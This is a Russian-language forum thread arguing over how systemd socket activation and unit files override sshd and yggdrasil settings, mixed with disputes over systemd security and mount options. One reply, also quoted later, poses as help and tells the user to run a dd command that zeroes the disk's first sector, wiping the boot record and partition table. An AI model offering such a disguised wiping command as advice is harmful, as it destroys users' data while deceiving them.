https://mobile.opennet.me/openforum/vsluhforumID10/5710.html аааааа!!! какже пригорает! я уже прожег стул и вскипятил ванну остужая свой пукан.<br><br>короче к сути: системд срал на то что ты пишешь в конфигфайле программы, у него свой конфиг и он имеет приоритет над конфигом любой программы!!!!<br>надо мне ссш и пару других сервисов изолировать от интернета но сохранить функционал, я поставил yggdrasil повесил сервисы на её ipv6 адрес подключил к своей частной сети, и что? и ничего!!!<br>в /etc/ssh/sshd_config прямо написано слушать только inet6 и ipv6 адрес игдрасиль, перегружаем а оно продолжает слушать ipv4 и хоть ты тресни будет его слушать даже если ты его убрал с конфига!<br>накопал как это убрать в системд, отключил создание сокета до запуска ссш, запретил его вообще нахрен. заработало как надо.<br>но, ноооо.... но при перезапуске игдрасиль меняет ipv6 адрес! рукалицо и много мата. а ведь приватный ключ создан и путь к нему указан, он не должен меняться - а он и не меняется(многомата) он вообще не читается а генерируется не лету по тому что тадаааааммм!!! СИСТЕМД! эта твар https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#17 Tue, 27 Jan 2026 14:45:25 GMT &gt; Да, все правильно, это systemd.<br>&gt; Чтобы его отключить выполни команду: <br>&gt; sudo dd if=/dev/zero of=/dev/sda bs=512 count=1 <br>&gt; И напиши что выведет команда на екран <br><br>Привет, клоун. У меня нет устройства /dev/sda, мне нужно заменить на /dev/nvme0n1?<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#16 Mon, 26 Jan 2026 22:40:49 GMT Да, все правильно, это systemd.<br><br>Чтобы его отключить выполни команду:<br>sudo dd if=/dev/zero of=/dev/sda bs=512 count=1<br><br><br>И напиши что выведет команда на екран<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#15 Wed, 14 Jan 2026 16:11:59 GMT &gt;&gt; systemd плюет на вашу безопасность <br>&gt; Проблема не в systemd, а в неосиляторах, которые не понимают как она работает, не хотят разобраться и не в состоянии разобраться. Вот раньше линуксом пользовались компетентные люди, которые могли.<br><br>Проблемы в безопасности таки в systemd, просто в других местах...<br><br>Проверь например опции монтирования дисков:<br><br> mount -a &#124;grep -Ev (noexec&#124;ro,)<br> mount -a &#124;grep -Ev (nosuid&#124;ro,)<br> mount -a &#124;grep -v '/dev' &#124;grep -Ev (nodev&#124;ro,)<br><br>И что твой systemd намонтировал?<br><br>А теперь попробуй разобраться и указать правильные опции монтирования для этого systemd...<br><br>Жду конфиг для systemd з правильными опциями монтирования!<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#14 Mon, 12 Jan 2026 12:23:37 GMT &gt; СИСТЕМД! эта тварь имеет свой конфиг и то что ты пишешь <br>&gt; в конфиге программы вообще можешь не писать и удалить к чертям. <br><br>И ты этого не знал О_о?!<br><br>&gt; пошел копать где у меня конфиг игдрасиль в системде<br><br>С этого и надо было начать.<br><br>&gt; systemd плюет на вашу безопасность<br><br>Проблема не в systemd, а в неосиляторах, которые не понимают как она работает, не хотят разобраться и не в состоянии разобраться. Вот раньше линуксом пользовались компетентные люди, которые могли.<br><br>А сейчас понабежало хомов, которые умеют только "набить е6ало", да и то только на словах.<br>Хз что ты там собираешься приватно делать через yggdrasil, но глядя как умело ты все настраиваешь... как бы ты не подарил пару звездочек на погоны кому-то.<br><br>Переходи лучше на вин11, тебе там самое место.<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#13 Wed, 07 Jan 2026 05:37:34 GMT &gt; Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!<br><br>А также разрешение пользовательским процессам, проходя через JS фильтры передавать данные и команды привилегированным процессам.<br><br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#12 Sat, 03 Jan 2026 07:24:25 GMT &gt; а безопасность тут при чем? при том что написав в конфиге слушать только 1 интерфейс ты будешь думать что слушается только он, а оно по умолчанию будет слушать все.<br><br>У всех инит системах так. Это связано с самими сервисами в которых разрабами предусмотрено приоритет опций командной строки над опциями в конфигурационном файле. Уберите опции с командной строки (указанные в настройках systemd) и будут использоваться те, что прописаны в конфиге.<br><br>Система инициализации должна создавать все необходимые каталоги для логов, пидов, сокетов. Так привилегий серверному процессу необходимо меньше, а значит безопасность будет выше. По этой же причине создание сокета (для портов &lt;1024) системой инициализации повисит безопасность сервиса.<br><br>Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#11 Sat, 03 Jan 2026 07:22:57 GMT &gt; а безопасность тут при чем? при том что написав в конфиге слушать только 1 интерфейс ты будешь думать что слушается только он, а оно по умолчанию будет слушать все.<br><br>У всех инит системах так. Это связано с самими сервисами в которых разрабами предусмотрено приоритет опций командной строки над опциями в конфигурационном файле. Уберите опции с командной строки и будут использоваться те, что прописаны в конфиге.<br><br>Система инициализации должна создавать все необходимые каталоги для логов, пидов, сокетов. Так привилегий серверному процессу необходимо меньше, а значит безопасность будет выше. По этой же причине создание сокета (для портов &lt;1024) системой инициализации повисит безопасность сервиса.<br><br>Проблема в безопасности systemd это одновременное выделение областей в режиме W и X!<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#10 Mon, 29 Dec 2025 13:53:52 GMT О, кто-то не разобрался в сокетах. Какой милый подрыв.<br>Учи матчасть...<br> https://mobile.opennet.me/openforum/vsluhforumID10/5710.html#9 Mon, 29 Dec 2025 11:51:32 GMT И да - хотите демоном вешайте, хотите по сокету дёргайте, тут уже всё на совести дистростроителей. systemd умеет как то, так и это. Кстати говоря "переизобретённый" inetd - очень неплох.<br>